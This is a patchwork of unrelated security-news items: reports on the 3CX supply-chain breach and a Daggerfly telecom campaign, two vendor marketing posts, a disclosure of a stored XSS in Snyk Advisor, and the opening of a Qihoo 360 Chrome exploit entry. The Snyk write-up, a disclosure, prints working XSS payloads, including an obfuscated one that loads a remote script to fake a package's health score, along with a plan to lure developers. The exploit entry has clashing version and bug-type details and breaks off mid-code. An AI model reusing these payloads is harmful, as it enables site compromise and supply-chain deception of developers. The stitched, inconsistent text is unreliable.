The mass compromise of the VoIP firm's customers is the first confirmed incident where one software supply chain attack enabled another, researchers say.

The cybersecurity industry has scrambled in recent weeks to understand the origins and fallout of the breach of 3CX, a VoIP provider whose software was corrupted by North Korea-linked hackers in a supply chain attack that seeded out malware to potentially hundreds of thousands of its customers. Cybersecurity firm Mandiant now has an answer to the mystery of how 3CX was itself penetrated by those state-sponsored hackers: The company was one of an untold number of victims infected with the corrupted software of _another_ company—a rare, or perhaps even unprecedented, example of how a single group of hackers used one software supply chain attack to carry out a second one. Call it a supply-chain chain reaction.

Today, Mandiant revealed that in the midst of its investigation of the 3CX supply chain attack, it's now found the patient zero for that widespread hacking operation, which hit a significant fraction of 3CX's 600,000 customers. According to Mandiant, a 3CX employee’s PC was hacked through an earlier software supply chain attack that hijacked an application of Trading Technologies, a financial software firm that was targeted by the same hackers who compromised 3CX. That hacker group, known as Kimsuky, Emerald Sleet, or Velvet Chollima, is widely believed to be working on behalf of the North Korean regime.

Mandiant says the hackers somehow managed to slip backdoor code into an application available on Trading Technology's website known as X\_Trader. That infected app, when it was later installed on the computer of a 3CX employee, then allowed the hackers to spread their access through 3CX's network, reach a server 3CX used for software development, corrupt a 3CX installer application and infect a broad swathe of its customers, according to Mandiant.

“This is the first time we've ever found concrete evidence of a software supply chain attack leading to another software supply chain attack,” says Mandiant chief technology officer Charles Carmakal. “So this is very big, and very significant to us.”

Mandiant says it hasn't been hired by Trading Technologies to investigate the original attack that exploited its X\_Trader software, so it doesn't know how the hackers altered Trading Technologies' application or how many victims—other than 3CX—there may have been from the compromise of that trading app. The company notes that Trading Technologies had stopped supporting X\_Trader in 2020, though the application was still available for download through 2022. Mandiant believes, based on a digital signature on the corrupted X\_Trader malware, that Trading Technologies' supply chain compromise occurred before November 2021, but that the 3CX follow-on supply chain attack didn't occur until early this year.

A spokesperson for Trading Technologies told WIRED that the company had warned users for 18 months that X\_Trader would no longer be supported in 2020, and that, given that X\_Trader is a tool for trading professionals, there's no reason it should have been installed on a 3CX machine. The spokesperson added that 3CX was not a customer of Trading Technologies, and that any compromise of the X\_Trader application doesn't affect its current software. 3CX didn't respond to WIRED's request for comment.

Exactly what the North Korean hackers sought to accomplish with their interlinked software supply chain attacks still isn't entirely clear, but it appears to have been motivated in part by simple theft. Two weeks ago, cybersecurity firm Kaspersky revealed that at least a handful of the victims targeted with the corrupted 3CX application were cryptocurrency-related companies based in "Western Asia," though it declined to name them. Kaspersky found that, as is often the case with massive software supply chain attacks, the hackers had sifted through their potential victims and delivered a piece of second-stage malware to only a tiny fraction of those hundreds of thousands of compromised networks, targeting them with “surgical precision.”

Mandiant agrees that at least one goal of the North Korea-linked hackers is no doubt cryptocurrency theft: It points to earlier findings from Google's Threat Analysis Group that AppleJeus, a piece of malware tied to the same hackers, was used to target cryptocurrency services via a vulnerability in Google's Chrome browser. Mandiant also found that the same backdoor in 3CX's software was inserted into another cryptocurrency application, CoinGoTrade, and that it shared infrastructure with yet another backdoored trading app, JMT Trading.

All of that, in combination with the group's targeting of Trading Technologies, points to a focus on stealing cryptocurrency, says Ben Read, Mandiant's head of cyberespionage threat intelligence. A broad supply chain attack like the one that exploited 3CX's software would “get you in places where people are handling money,” Read says. “This is a group heavily focused on monetization.”

But Mandiant's Carmakal notes that given the scale of these supply chain attacks, crypto-focused victims may still be just the tip of the iceberg. “I think we'll learn about many more victims over time as it relates to one of these two software supply chain attacks,” he says.

While Mandiant describes the Trading Technologies and 3CX compromises as the first known instance of one supply chain attack leading to another, researchers have speculated for years about whether other such incidents were similarly interlinked. The Chinese group known as Winnti or Brass Typhoon, for instance, carried out no fewer than six software supply chain attacks from 2016 to 2019. And in some of those cases, the method of the hackers' initial breach wasn't ever discovered—and may well have been from an earlier supply chain attack.

Mandiant's Carmakal notes that there were signs, too, that the Russian hackers responsible for the notorious SolarWinds supply chain attack were also doing reconnaissance on software development servers inside some of their victims, and were perhaps planning a follow-on supply chain attack when they were disrupted.

After all, a hacker group capable of carrying out a supply chain attack usually manages to cast a vast net that pulls in all sorts of victims—some of whom are often software developers that themselves offer a powerful vantage point from which to carry out a follow-on supply chain attack, casting out the net yet again. If 3CX is, in fact, the first company hit with this sort of supply-chain chain reaction, it's unlikely to be the last.

The Huge 3CX Breach Was Actually 2 Linked Supply Chain Attacks

Why is Visibility into OT Environments Crucial?
The significance of Operational Technology (OT) for businesses is undeniable as the OT sector flourishes alongside the already thriving IT sector. OT includes industrial control systems, manufacturing equipment, and devices that oversee and manage industrial environments and critical infrastructures. In recent years, adversaries have recognized the

****Why is Visibility into OT Environments Crucial?****

The significance of Operational Technology (OT) for businesses is undeniable as the OT sector flourishes alongside the already thriving IT sector. OT includes industrial control systems, manufacturing equipment, and devices that oversee and manage industrial environments and critical infrastructures. In recent years, adversaries have recognized the lack of detection and protection in many industrial systems and are actively exploiting these vulnerabilities. In response, IT security leaders have become more aware of the need to protect their OT environments with security monitoring and response capabilities. This development was accelerated by severe past cyber incidents targeting critical OT environments and even causing physical damage to infrastructures. Given the pivotal role these systems play in business operations and modern society, ensuring their security is of utmost importance.

The underlying trend is clear: OT and IoT networks are progressively integrated with traditional IT networks for management and access purposes, leading to increased communication between these devices both internally and externally. This not only affects the networks itself but also carries significant ramifications for the security teams responsible for safeguarding the environment. Although this convergence of OT and IT offers numerous benefits, such as enhanced efficiency and reduced operational costs, it also gives rise to new security risks and challenges, rendering OT environments more vulnerable to cyber threats. As evidenced by past attacks, these threats often go undetected due to insufficient security monitoring, allowing threat actors to remain undetected for extended durations. As a result, achieving holistic visibility and effective anomaly detection in OT environments is pivotal for maintaining steadfast security and control.

****What Challenges Arise in Monitoring OT Environments?****

First and foremost, understanding the unique threat landscape of OT environments is crucial. Traditional IT security detection methods fall short in this context, as they require different sensitivity thresholds and more refined monitoring for network segments or device groups, as well as OT-specific detection mechanisms. Unlike IT attacks that focus on data theft, OT attacks typically aim for physical impact. Moreover, as recent examples demonstrate, ransomware in the context of OT is on the rise and directly affects the availability of control systems and safety.

Second, monitoring OT environments requires the consideration of various aspects, such as supplier access management, device management, and network communications. Controlling and overseeing supplier access to OT and IoT networks is challenging, as connections between external and internal networks can occur through various means like VPNs, direct mobile connections, and jump hosts. Another hurdle is device management, which encompasses update mechanisms and protection against unauthorized access or manipulation. Implementing regular updating routines and deploying Endpoint Detection & Response (EDR) on OT and IoT devices is often limited or infeasible. The variety of devices, their life spans, and device-specific operating systems make deploying security software to monitor OT devices difficult and cumbersome.

Third, traditional IT network detection methods require in-depth protocol knowledge, which, in the OT context, includes a wide range of different protocols and attack scenarios absent in traditional rule sets. OT network devices connect IoT sensors and machines using communication protocols uncommon in traditional IT networks. In terms of more intrusive security solutions, active vulnerability scanning methods can also be problematic in OT environments, as they may cause disruptions or even outages. The same applies to Intrusion Prevention Systems (IPS) because they could block network packets, impacting stability and business continuity in OT environments. As a result, passive network detection systems like Network Detection & Response (NDR) solutions are better suited for this purpose.

****How Can I Effectively Monitor and Secure My OT Environment?****

While secure access management and device lifecycle management are essential, their seamless implementation can be incredibly challenging. In this context, Network Detection and Response (NDR) solutions offer a non-intrusive and effective approach to monitoring OT environments. By focusing on communication patterns for OT devices, the intersection between IT and OT, and third-party access to OT networks, NDR systems provide comprehensive visibility and detection capabilities without disrupting industrial operations and business processes.

In particular, NDR solutions with advanced baselining capabilities excel at identifying new and unusual communication patterns that could indicate malicious activities within OT networks. Utilizing flow information for baselining, these NDR systems provide protocol and device-independent anomaly detection by learning who communicates with whom and at what frequency. Instead of manually configuring these parameters, the NDR learns the baseline and alerts the security teams on unusual requests or changes in the frequency. In addition, a flexible use case framework allows setting fine-tuned thresholds for OT-specific monitoring, including the ability to set load monitoring with network zone-specific granularity. Moreover, the use of Machine Learning algorithms allows for more accurate detection of anomalies and potential threats compared to traditional rule-based systems.

As a result, the passive monitoring capabilities of NDR solutions are vital for OT and IoT environments, where alternative monitoring methods may be difficult to implement or cause disruptions. ExeonTrace, a particularly robust and easy-to-implement ML-driven NDR system for OT environments, analyzes log data from traditional IT environments, OT networks, and jump host gateways, to provide a comprehensive and holistic view of network activity. Therein, the flexibility of integrating various third-party log sources, such as OT-specific logs, is crucial. Moreover, ExeonTrace's ability to integrate with other OT-specific detection platforms enhances its capabilities and ensures extensive security coverage.

ExeonTrace Platform: OT Network Visibility

In summary, NDR solutions like ExeonTrace effectively address the distinct challenges of OT monitoring, establishing the Swiss NDR system as the favored detection approach for safeguarding OT environments. By implementing ML-driven NDR systems like ExeonTrace, organizations can reliably monitor and secure their industrial operations, ensuring business continuity through an automated, efficient, and hardware-free approach. Find out if ExeonTrace is the ideal solution for your business and request a demo today.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beyond Traditional Security: NDR's Pivotal Role in Safeguarding OT Networks

Categories: Business
#1 in Endpoint Protection, #1 ROI for EDR, #1 for EDR implementation.



(Read more...)




The post What your peers said: G2 comparison of top Endpoint Security vendors appeared first on Malwarebytes Labs.

Navigating the world of endpoint security is challenging, with numerous vendors stoking FUD and making bold claims that are difficult to verify. In times like these, the honest opinions of real users are invaluable for busy IT teams.

Enter G2, an industry-leading peer-to-peer review site. Each quarter, G2 releases reports highlighting the products with the highest customer satisfaction and strongest market presence.

In the G2 Spring 2023 Grid Reports, **Malwarebytes earned the title of 'Leader' in 24 categories, including the #1 spot in Endpoint Protection, the Best ROI for EDR, and #1 for EDR implementation in the mid-market segment.**

Let's take a closer look at how organizations evaluated solutions and what they said about using Malwarebytes.

**#1 Endpoint Protection: Highest Rated for Results, Relationship, and More**

Malwarebytes Endpoint Protection (EP), the essential foundation of our EDR and MDR offerings, won dozens of awards based on receiving the highest customer satisfaction score across a range of areas, including “Ease of setup," “Ease of admin," “Quality of support”, and more.

Dashboard for Nebula, the cloud-hosted security platform for EP and EDR

For example, Malwarebytes EP won the “**Best Results**” badge (highest overall Results score) by having the highest combination of estimated ROI, meets requirements, and likelihood to recommend scores. What some of our customers had to say:

> “Malwarebytes is easy to install and configure. It integrates with Windows 10 and runs silently in the background. Infection rate of Malware has dropped dramatically. If I run across a machine that has Malware, installing it cleans it up almost 100% of the time.”
> 
> Chris S.

> “Malwarebytes was able to detect and block a virus that our previous AV was not able to. Wish we had moved to this product sooner.”
> 
> Robert S.

> “I consider myself faithful to this software because Malwarebytes has taken me out of problems that other antivirus programs have not been able to solve. It is not a very heavy software and can run in the background without even noticing it thanks to the updates.”
> 
> Verónica M.

Customers also praised Malwarebytes for its friendly staff and exceptional support, for which we won the “**Best Relationship**” badge by having the highest combination of "Likely to Recommend" , “Ease of business,” and “Quality of Support” ratings. Here's what some of our customers had to say:

> “The support team started us off on the right track by getting us up and running in no time. Any questions I had before and after setup were answered quickly and thoroughly.”
> 
> Gary P.

> “Highly recommended, and their support team is the best you can ask for!.”
> 
> Rifaat K.

**Best ROI for EDR: Rapid Return on Investment**

Our EDR solution delivers an impressive return on investment by quickly enhancing your organization's security posture. Malwarebytes EDR is designed to be both efficient and cost-effective, allowing your team to see the benefits of your investment immediately.

By focusing on ease of use, quick implementation, and powerful security features without requiring an IT security army, Malwarebytes ensures that your organization is maximizing resources and receiving the best ROI in the industry.

Malwarebytes had the **best estimated ROI (payback period in months) on the Enterprise Grid® Report for Endpoint Detection & Response (EDR) at just 14 months, compared to Crowdstrike at 22 months**.

> “The best part about Malwarebytes is the set it and forget it. It has saved us so much time on deployment and remediation that it pays for itself in no time at all.”
> 
> Ron M.

> “It keeps our working environment much more secure than our previous solution. Much easier to manage in real time. This thing is a money saver and pays for itself.”
> 
> Tyson B.

**Most Implementable EDR: Seamless Setup and User-Friendly Experience**

On the Mid-Market Implementation Index for Endpoint Detection & Response (EDR) Malwarebytes EDR clutched the #1 spot. With a seamless setup process, your team can spend more time focusing on what matters most: protecting your organization from cyber threats. Here’s how we won:

*   Malwarebytes EDR has an **Implementation Score of 89%**, which is higher than the industry average of 82%.
*   Ease of Setup: **Malwarebytes EDR scores 95%** in ease of setup, compared to the industry average of 90%.
*   Average User Adoption: Malwarebytes EDR has an average **user adoption rate of 91%**, surpassing the industry average of 85%.
*   Time to Go Live (Months): The average time it takes for **Malwarebytes EDR to become fully operational is just 0.49 months, over 2X shorter than the industry average of 1.41 months**.

> “If you are purchasing Malwarebytes, then you have made the correct choice. You will quickly see how easy it is to implement, and how great their support is.”
> 
> Mauro B.

> “Very easy to install and deploy, setup, and configure - for instance - a 5 machine setup would take roughly ~10 mins from start to finish.”
> 
> Verified User

> “Easy to use and implement, along with great support and support tools at your disposal, along with courses to help you become more familiar with the inner workings."
> 
> Doug C.

Two options to easily begin deployment with your endpoint users in Nebula

**Experience Malwarebytes for Business: Award-winning ROI, user-friendly, and effective threat defense**

Malwarebytes provides IT staff with award-winning business solutions, offering unmatched threat protection, a lightning-fast return on investment, and a smooth, speedy implementation.

Try Malwarebytes EDR today and join the ranks of those who have already discovered the amazing results, support, ROI, and more of our exceptional endpoint security solutions.

**Upgrade to Enterprise-Grade Protection**

What your peers said: G2 comparison of top Endpoint Security vendors

Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.
The intrusions have been pinned on a hacking crew tracked by Symantec as Daggerfly, and which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda.
The campaign makes use of "previously unseen plugins from

Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.

The intrusions have been pinned on a hacking crew tracked by Symantec as **Daggerfly**, and which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda.

The campaign makes use of "previously unseen plugins from the MgBot malware framework," the cybersecurity company said in a report shared with The Hacker News. "The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software."

Daggerfly's use of the MgBot loader (aka BLame or MgmBot) was spotlighted by Malwarebytes in July 2020 as part of phishing attacks aimed at Indian government personnel and individuals in Hong Kong.

According to Secureworks, the threat actor uses spear-phishing as an initial infection vector to drop MgBot as well as other tools like Cobalt Strike and an Android remote access trojan (RAT) named KsRemote.

The group is suspected to conduct espionage activities against domestic human rights and pro-democracy advocates and nations neighboring China as far back as 2014.

Attack chains analyzed by Symantec show the use of living-off-the-land (LotL) tools like BITSAdmin and PowerShell to deliver next-stage payloads, including a legitimate AnyDesk executable and a credential harvesting utility.

The threat actor subsequently moves to set up persistence on the victim system by creating a local account and deploys the MgBot modular framework, which comes with a wide range of plugins to harvest browser data, log keystrokes, capture screenshots, record audio, and enumerate the Active Directory service.

UPCOMING WEBINAR

Defend with Deception: Advancing Zero Trust Security

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

"All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines," Symantec said. "The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering."

The all-encompassing nature of MgBot indicates that it's actively maintained and updated by the operators to obtain access to victim environments.

The disclosure arrives almost a month after SentinelOne detailed a campaign called Tainted Love in Q1 2023 aimed at telecommunication providers in the Middle East. It was attributed to a Chinese cyberespionage group that shares overlaps with Gallium (aka Othorene).

Symantec further said it identified three additional victims of the same activity cluster that are located in Asia and Africa. Two of the victims, which were breached in November 2022, are subsidiaries of a telecom firm in the Middle East region.

"Telecoms companies will always be a key target in intelligence gathering campaigns due to the access they can potentially provide to the communications of end-users," Symantec said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Daggerfly Cyberattack Campaign Hits African Telecom Services Providers

The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to a stored XSS prior to 28th March 2023. A feature of Snyk Advisor is to display the contents of a scanned package's Readme on its package health page. An attacker could create a package in NPM with an associated markdown README file containing XSS-able HTML tags. Upon Snyk Advisor importing the package, the XSS would run each time an end user browsed to the package's page on Snyk Advisor.

10 Apr 2023

**tl;dr**

> _tl;dr - a **stored XSS in Snyk Advisor (domain:snyk.io)** allowed me to fabricate the health score granted for packages in my control, which I leveraged into making it seem as my “malicious” package is in fact healthy, popular and legitimate, which could have served an attacker to convince others to **install an actual malicious npm package**._

Vulnerability Disclosure Report 📝 , Exploit PoC 💻

**What motivated me to write this?**

On March of 2023 **I found a stored XSS vulnerability in Snyk Advisor under snyk.io domain**.

Because Snyk is a security services vendor, I was wondering if there’s anything more interesting and creative to be done here than just compromise the application and/or its current logged in victim. So I dedicated some time into maximizing the impact that one can achieve with such a vulnerability, to help Snyk defend themselves against any further potential damage they might be exposed to.

In this article I demonstrate how I can take such a vulnerability and turn it against the business itself, and the very main purpose of the Snyk Advisor service.

**Supply chain security - an intro**

Supply chain security is something we constantly hear of in the past years, and **for a good reason**.

We build our software on top of a long chain of dependencies that we don’t control and that change frequently, so just trusting them to be legitimate and safe in the long run is not something we can count on.

This situation naturally creates a **clear motivation for attackers to infiltrate your supply chain** and we’ve seen plenty of such examples in the past year.

That’s why in the past few years we have seen more and more attempts to create products that try to secure against supply chain attacks.

I myself have dedicated years into improving the worlds’ chances against JavaScript supply chain attacks by being the creator of PerimeterX’s CodeDefender, the creator and maintainer of Snow ❄️ JS and the maintainer of the highly advanced supply chain security tool LavaMoat 🌋.

There are a number of ways attackers can leverage your need for building your software on top of third party dependencies, here are two main ones:

**1\. Compromising an already-used legitimate package**

One thing attackers try to do is to find a third party package that is being used by the maintainer of the application they wish to attack, and then **take control over it**. Taking control over a successful package is not always easy, but once control is gained, the attacker can push a new version for the package, introducing the exploit to all its downstream users.

At this point, it’s likely that the maintainer will eventually update their dependencies to their newer versions, thus potentially **pulling the compromised version** of the breached dependency **without even being aware of that**.

**2\. Luring to use a yet-to-be-used malicious package**

Another thing attackers might do is to publish a new dependency they control and make it look like it does legitimate stuff, then try to lure developers into installing those in their projects. Once they do, the package which isn’t actually legitimate, can **compromise the software**.

However, this requires some level of sophistication, because you must convince the developer, a human being, that your package is legitimate and trustworthy - and that is a hard task considering the level of awareness developers have for the potential damage that lies in using a new and unfamiliar package.

Let’s elaborate on that.

**Luring developers is hard!**

Because of the growing concern that evolves around supply chain attacks, developers are more aware of the problem and make sure to **be able to tell the difference between a legitimate package and a suspicious one.**

So what actions do developers take when considering installing a new package?

Here’s a perfect answer to the question by the amazing **ChatGPT**!

> _“(1) popularity and reputation”_

I’d say, **this is where you start**. A good way to get a general sense of the legitimacy of a package is by understanding **how popular and well known it is**. It’s usually **never enough** to fully tell its legitimacy, but it does help knowing many people starred it, or even better, recently downloaded and used it.

> _“(2) dependencies, (3) source code and (4) maintainers”_

These are even better ways for telling if a package is trustworthy. Popularity for itself isn’t enough, but if you can afford going through its **dependencies and maintainers** and make sure they’re also **popular and legit**, it would help a lot in making the decision. If you can even afford browsing through its **source code** that’s amazing! But that’s unlikely to be something we’re going to do.

> _“(5) license”_

I’m honestly not sure how’s this related, but I had to give ChatGPT the credit for trying 🤷. Although next one is the killer section - the one I was hoping ChatGPT would bring up:

> _“(6) Use a package verification tool … such as **Snyk**“_

This is the **ultimate** section that is supposed to **eliminate the need for all previous sections**. As I previously wrote, due to the clear danger posed by third party packages, we now have third party services to help us verify the integrity of third party packages **instead of having to do the dirty job ourselves**.

**These products are your one-stop-shop!**

They examine all packages and take into consideration everything mentioned above - such as popularity, usage, number of recent downloads, integrity of contributors, level of community engagement and even potentially source code static analysis - and they **calculate it all into a score**, to give you a sense of how legitimate for use that package.

In other words, **they try to combine steps 1-4 into a single service, so you wouldn’t have to go through them yourself.**

There are more such services than just Snyk, (e.g. Socket Security), but Snyk is probably the **most popular service** in the industry.

**A single point of failure**

When thinking about it, Snyk Advisor (or any other similar tool) being a **one-stop-shop** can potentially be an issue, because if it fails it could also be **a single point of failure**.

In other words, Snyk providing all the information you need for deciding if to use a package or not means you can skip the due diligence you were planning to do yourself, and just **trust their health score completely**.

And if the integrity of the service is broken, you wouldn’t count on a second service to help you discover that - because that’s the whole point of the advisory service!

This of course counts on an ability to break the integrity of the service, which is **not a trivial assumption** at all.

> While the risks here are likely minimal, it’s still always worth thinking about these hypothetical possibilities and maintaining healthy security hygiene - one way of doing this is to dedicate effort from time to time spot checking the underlying data on important projects to make sure everything makes sense.

**Markdown XSS**

In this story, the vulnerability isn’t too interesting for itself to be honest. It’s a simple **XSS via Markdown** situation, which isn’t a new concept (lookup “Markdown XSS” on Google).

But just to sum it up for you:

*   Markdown specification explicitly supports Raw HTML almost to a full extent.
*   This includes HTML attributes.
*   That is a combination that allows the most classic XSS injections:
    *   (hit ▶️ to execute on the official Markdown live interpreter)
    *   ▶️ <iframe onload="alert(1)">
    *   ▶️ <img src="1" onerror="alert(1)">
    *   Note that the interpreter executes those inside a sandboxed iframe, so instead of actually seeing an alert message, you’ll see a thrown CSP exception in the console, but the conclusion remains the same - **Markdown supports HTML, even if it triggers JavaScript execution!**

Again, this **isn’t anything new**. It just means that if a service wishes to parse and display Markdown content, they must **perform proper sanitization to disallow XSS**.

The sanitization/defense tactics differ among different services.

Some perform a more **strict** sanitization (such as GitHub/npm) where they drop anything that might load any arbitrary html/js.

Some services perform a **lax** sanitization (such as discourse) where they still drop anything that might be dangerous, but nothing more. For example, on discourse <iframe> will translate into an actual iframe whereas on GitHub the iframe is dropped (even though turning the iframe into arbitrary code execution is impossible in both).

But most importantly, regardless of how lax or strict your sanitization is, you’d want to add **a second layer of defense by using some CSP rules to ensure any Markdown XSS that infiltrated your app will be blocked right away** (can be seen in VSCode editor for example).

Not surprisingly, some services perform **little to no sanitization at all**.

For some of them it makes sense (kinda?) - If you go on StackEdit for example and paste <iframe src="https://weizman.github.io?msg=code_execution_!"> you’ll see an alert message that proves the app parsed this as Markdown and lacked CSP for blocking the load of a remote page into an iframe (Perhaps because this is a local text editor for you to come up with your own content).

But some services have more to lose than the StackEdit example above, and therefore they usually make sure to perform some level of sanitization.

And if they don’t, well, **that could be a problem**.

**Markdown to (stored) XSS on Snyk Advisor (snyk.io domain)**

To my surprise, the lack of sanitization was **exactly the case with Snyk.**

Snyk’s advisor app as mentioned above gives you the information you’re looking for when considering to use a new package, and to be as informative as possible, they also **display the README file of the package** you’re looking at.

Which means, they are **turning Markdown into HTML** to display the content.

By running **no sanitization and implementing no CSP** in the app, a README file containing an XSS will **successfully execute in the app!**

Before disclosing this, you could have seen the exploit running live on the package I was experimenting with at https://snyk.io/advisor/npm-package/png2jpg.

Since it’s already fixed by now, you can see it before it was fixed by visiting the official Vulnerability report as sent to Snyk I handed Snyk.

**Impact**

So why is this worrying? In the context of what we discussed earlier, harming the integrity of the advisor can turn a package **from malicious to fully trustworthy in the eyes of the victim!**

**Exploiting the vulnerability!**

Let’s exploit this vulnerability as an **attacker** to understand what I mean.

**Find a need**

First, I looked for stuff people might need a solution for.

From a quick search online I learned that people have tried previously to convert pngs to jpgs using JavaScript. Here’s a stackoverflow example.

**Register a package**

I need a good name for a package that looks legitimate and inviting and that is available on npm. After a while I found png2jpg to not be taken - **I’ll take it!**

    {
      "name": "png2jpg",
      "version": "0.0.1",
      "description": "convert png to jpg",
      "main": "index.js",
      "repository": {
        "type": "git",
        "url": "git+https://github.com/weizman/png2jpg.git"
      },
      "keywords": [],
      "author": "",
      "license": "MIT",
      "bugs": {
        "url": "https://github.com/weizman/png2jpg/issues"
      },
      "homepage": "https://weizman/png2jpg/",
    }
    

(package.json)

**Cause “fake” damage**

This is a malicious package after all, so let’s implement a malicious payload such as:

    // index.js
    console.log('PAYLOAD EXECUTED!')
    

(index.js)

**Create a deceitful README file**

This is an important part - we want the package to look legit and inviting, so we want its official README file to reflect that:

    ## png2jpg - A NodeJS tool for converting pngs to jpgs
    
    ### Install
    
    yarn add png2jpg / npm install png2jpg
    
    ### Usage
    
    const png2jpg = require('png2jpg');
    const jpg = await png2jpg(png);
    

(README.md)

Real attackers will also add badges, images and maybe gifs to do a better job “selling it” - we’re not gonna focus on that.

**PoC - Exploit Snyk Advisor’s vulnerability**

Our package is live and accessible on npm! But Snyk Advisor ranks its health score low, being the unpopular package that it is:

making it **completely not trustworthy.**

However, since we have **code execution privileges**, we can use it to **change the layout!**

When we update the README file to this (observe the bottom line):

    ## png2jpg - A NodeJS tool for converting pngs to jpgs
    
    ### Install
    
    yarn add png2jpg / npm install png2jpg
    
    ### Usage
    
    const png2jpg = require('png2jpg');
    const jpg = await png2jpg(png);
    
    <img src="//no-such-domain-2390dkj.com/" onerror="alert(location.href)">
    

and publish the package, after Snyk Advisor scans it, when visiting https://snyk.io/advisor/npm-package/png2jpg the alert pops:

**Leverage exploit to fabricate Advisor results**

We proved code execution on https://snyk.io/advisor/npm-package/png2jpg, it’s time to **make it dance!**

First, Snyk Advisor’s scan takes a few days with each new package version that is published, so I preferred implementing  
an external payload script that I can change as much as I want.

Therefore, here’s the update to the README file:

    ## png2jpg - A NodeJS tool for converting pngs to jpgs
    
    ### Install
    
    yarn add png2jpg / npm install png2jpg
    
    ### Usage
    
    const png2jpg = require('png2jpg');
    const jpg = await png2jpg(png);
    
    <img src="//no-such-domain-2390dkj.com/" onerror="eval(atob('KGZ1bmN0aW9uKCl7IGNvbnN0IHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy5zcmMgPSAnaHR0cHM6Ly93ZWl6bWFuLmdpdGh1Yi5pby9wdWJsaWMvc2VydmljZS5qcyc7IGRvY3VtZW50LmhlYWQuYXBwZW5kKHMpOyB9KCkp'))">
    

Which translates into:

    (function(){ 
     const s = document.createElement('script'); 
     s.src = 'https://weizman.github.io/public/service.js'; // service.js looks more legit!
     document.head.append(s); 
    }())
    

Which simply loads the payload externally:

    (function(){
        // don't run more than once
        if (top.__ran) return; else top.__ran = true;
    
        // remove the "Unable to verify the project's public source code repository." alert message
        document.querySelector('.alert').remove();
    
        // capture all needed elements in the page
        const extra = document.querySelector('.package-extra');
        const security = document.querySelector('#security');
        const community = document.querySelector('#community');
        const popularity = document.querySelector('#popularity');
        const maintenance = document.querySelector('#maintenance');
        const copy = document.querySelectorAll('button')[0];
    
        // replace the HTML of the "extra", "security" and "community" information boxes with 
        // the HTML from the node package to deliver a more reliable message
        extra.innerHTML = atob('<LARGE_B64>');
        security.innerHTML = atob('<LARGE_B64>');
        community.innerHTML = atob('<LARGE_B64>');
    
        // remove the "popularity" and "maintenance" information boxes 'cause I was too lazy to immulate them
        popularity.remove()
        maintenance.remove()
    
        // remove the image we used in the XSS to reduce suspiciousy
        setTimeout(() => {
            document.querySelector(atob('aW1nW3NyY149Ii8vIl0=')).remove();
        }, 200);
    
        // reset the functionallity of the copy button because this exploit ruins it for some reason
        copy.id = '__copy'
        copy.outerHTML += '';
        __copy.addEventListener('click', () => {
            navigator.clipboard.writeText(atob('bnBtIGluc3RhbGwgcG5nMmpwZw=='));
        });
    }());
    

(payload.js)

And the result is **pretty good!**

And for a motivated attacker, the result could have been even **flawless** with some additional work on the **deception part**, but this should be enough for you to get the picture.

**Sell it!**

Now that our payload is successfully making our package look legit, all there’s left is to get someone to install it. I can do so by finding an online thread about someone trying to turn pngs to jpgs using JavaScript, and offer my service.

Here’s an actual thread on Stackoverflow of people who are looking for a solution - all I need to do is to suggest my package and link it to https://snyk.io/advisor/npm-package/png2jpg.

What’s likely to happen is that someone who sees it, will go on the Snyk link, see that my package is totally legit and popular (even though it isn’t), and copy the npm install png2jpg command from there, trusting Snyk Advisor completely - **Supply Chain Attack Achieved**!

**Conclusions**

This has been a short ride through exploiting an XSS vulnerability to **compromise the Snyk Advisory service central goal**, to be a trustworthy judge of npm packages.

I hope markdown sanitization and the dangers in not performing defense in depth are more clear to you after reading this.

**Builders**

Here are the two main takeaways from this research:

*   **Sanitize user input, including Markdown!** - Markdown allows html **by spec**! Therefore, if you present Markdown content, it might introduce XSSable HTML tags - **especially** if you are not the generator of the content! Just like the rest of your app, you need to sanitize Markdown content too.
*   **Use CSP!** - Sanitization **isn’t always perfect**. CSP is a great mechanizm for making sure any infiltrated XSS can’t actually end up executing. If your app presents content you don’t control, you should integrate CSP into it.

**Breakers**

**Markdown XSS is a concept**. There are a lot of services that parse and display Markdown, including IDEs.

They all might be vulnerable to this - I **encourge** you to go out and **seek for yourselves!**

If you find any - **responsibly** disclose your findings to the vulnerable vendor by cooperating with them.

> *   Visit Gal Weizman for more JavaScript security related content (also on twitter)
> *   Thank you Daniel Goldberg for your help in editing and improving this post! (also on twitter)

CVE-2023-1767: CVE-2023-1767 - Stored XSS on Snyk Advisor service can allow full fabrication of npm packages health score

Buffer Overflow vulnerability in Qihoo 360 Chrome v13.0.2170.0 allows attacker to escalate priveleges.

1.  \# Exploit Title: Qihoo 360 Chrome v12.0.1592.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/ee/
    
6.  \# Version: Qihoo 360 Chrome v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33970
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    

13.  Qihoo 360 Chrome v13.0.2170.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

15.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Chrome v13.0.2170.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

17.  function trigger() {
    
18.  let o = {a: 1};
    
19.  let p = new Proxy(o, {});
    
20.  p.\_\_proto\_\_ = {};
    
